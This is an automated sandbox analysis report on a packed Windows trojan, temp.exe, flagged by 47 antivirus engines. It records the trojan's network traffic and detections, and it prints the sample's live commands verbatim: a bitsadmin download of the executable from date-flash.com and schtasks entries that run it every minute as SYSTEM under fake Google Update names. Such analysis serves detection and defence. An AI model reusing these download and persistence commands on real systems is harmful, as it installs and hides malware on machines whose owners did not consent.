Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 21, 2021, 12:38 p.m.	June 21, 2021, 12:54 p.m.

Size	3.3MB
Type	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5	`d89c813bf46d01f144a20592d371f0cc`
SHA256	`984265f2a1df743a585b3ed1aa138080dbc0e27c66d2472d10a66c916739556c`
CRC32	`8D191CE7`
ssdeep	`98304:T1yVjqcy7Vr5Xvdy3FBtCNG7Kmvh6BD1HRx2ZrCluDWtmf:ZyiTXY3mpmbpDYm`
Yara	PE_Header_Zero - PE File Signature IsPE64 - (no description)

temp.exe "C:\Users\test22\AppData\Local\Temp\temp.exe"
9068
- cmd.exe C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
  6116
  - bitsadmin.exe bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
    3660
- cmd.exe C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
  3908
  - schtasks.exe schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
    2120
- cmd.exe C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
  3360
  - schtasks.exe schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
    4368

Name	Response	Post-Analysis Lookup
date-flash.com	A 103.209.101.233	103.209.101.233

IP Address	Status	Action
103.209.101.233	Active	Moloch
103.72.4.166	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
61.135.169.121	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49805 -> 61.135.169.121:80	2024897	ET USER_AGENTS Go HTTP Client User-Agent	Misc activity
TCP 192.168.56.102:49809 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49810 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49815 -> 103.209.101.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49821 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49823 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49824 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49825 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49826 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49828 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49829 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 103.209.101.233:443 -> 192.168.56.102:49816	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.102:49827 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49811 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49822 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic
TCP 192.168.56.102:49830 -> 103.72.4.166:8443	2028401	ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex	Unknown Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49809 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49810 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49821 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49823 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49824 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49825 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49826 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49828 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49829 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49827 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49811 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
TLSv1 192.168.56.102:49822 103.72.4.166:8443	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn	f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA June 21, 2021, 12:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:31 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 21, 2021, 12:31 p.m.	computer_name: TEST22-PC	1	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://61.135.169.121/
suspicious_features	Connection to IP address	suspicious_request	GET https://103.72.4.166:8443/images/logo_max.png
suspicious_features	Connection to IP address	suspicious_request	GET https://103.72.4.166:8443/images/logo.png
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w

Performs some HTTP requests (5 events)

request	GET http://61.135.169.121/
request	HEAD http://date-flash.com/temp.exe
request	GET https://103.72.4.166:8443/images/logo_max.png
request	GET https://103.72.4.166:8443/images/logo.png
request	POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w

Sends data using the HTTP POST Method (1 event)

request

POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w

Allocates read-write-execute memory (usually to unpack itself) (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 21, 2021, 12:31 p.m.	process_identifier: 9068 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000027c10000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2021, 12:31 p.m.	process_identifier: 9068 region_size: 4194304 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000029d60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2021, 12:31 p.m.	process_identifier: 9068 region_size: 311296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000286f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffffffffffff	1

Creates a suspicious process (5 events)

cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
cmdline	C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00350c00', u'virtual_address': u'0x0031c000', u'entropy': 7.869545546306953, u'name': u'UPX1', u'virtual_size': u'0x00351000'}

entropy

7.86954554631

description

A section with a high entropy has been found

entropy

0.999852746282

description

Overall entropy of this PE file is high

The executable is compressed using UPX (3 events)

section	UPX0	description	Section name indicates UPX
section	UPX1	description	Section name indicates UPX
section	UPX2	description	Section name indicates UPX

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe

Communicates with host for which no DNS query was performed (3 events)

host	103.72.4.166
host	172.217.25.14
host	61.135.169.121

Installs itself for autorun at Windows startup (4 events)

cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe

BITSAdmin Tool has been invoked to download a file

Network activity contains more than one unique useragent (2 events)

process	temp.exe				useragent
process	temp.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
cmdline	C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
cmdline	schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe

Detects the presence of Wine emulator (1 event)

Time & API	Arguments	Status	Return	Repeated
LdrGetProcedureAddress June 21, 2021, 12:31 p.m.	ordinal: 0 function_address: 0x000007feff017a50 function_name: wine_get_version module: ntdll module_address: 0x00000000771c0000		-1073741511	0

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.37043105
FireEye	Generic.mg.d89c813bf46d01f1
McAfee	Artemis!D89C813BF46D
Cylance	Unsafe
Zillya	Trojan.Rozena.Win32.124132
Sangfor	Riskware.Win32.Agent.ky
K7AntiVirus	Trojan ( 0056c3071 )
Alibaba	Backdoor:Win64/Shelma.da3ddcc0
K7GW	Trojan ( 0056c3071 )
Cybereason	malicious.4cb10c
Cyren	W64/Trojan.MYRZ-7542
Symantec	Trojan.Gen.2
ESET-NOD32	a variant of Win32/Rozena.AVL
APEX	Malicious
Avast	Win64:Trojan-gen
Kaspersky	Trojan.Win64.Shelma.lbo
BitDefender	Trojan.GenericKD.37043105
Paloalto	generic.ml
Tencent	Win64.Trojan.Shelma.Wstw
Ad-Aware	Trojan.GenericKD.37043105
Sophos	Mal/Generic-S
F-Secure	Trojan.TR/Rozena.sdjwo
DrWeb	Trojan.DownLoader39.52985
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R011C0WF821
McAfee-GW-Edition	BehavesLike.Win64.Gravity.wc
Emsisoft	Trojan.GenericKD.37043105 (B)
Ikarus	Trojan.Win32.Rozena
Jiangmin	Trojan.Shelma.ilj
MaxSecure	Trojan.Malware.300983.susgen
Avira	TR/Rozena.sdjwo
Antiy-AVL	Trojan/Generic.ASBOL.C5E3
Gridinsoft	Suspicious.XOR_Encoded.bot!yf
Microsoft	Trojan:Win32/Glupteba!ml
ZoneAlarm	Trojan.Win64.Shelma.lbo
GData	Trojan.GenericKD.37043105
Cynet	Malicious (score: 100)
ALYac	Trojan.GenericKD.37043105
MAX	malware (ai score=88)
VBA32	Trojan.Win64.Shelma
TrendMicro-HouseCall	TROJ_GEN.R011C0WF821
Yandex	Trojan.Shelma!1U+6LbCbUgU
Fortinet	W64/Shelma.AVL!tr
AVG	Win64:Trojan-gen
Panda	Trj/CI.A
CrowdStrike	win/malicious_confidence_80% (W)

temp.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All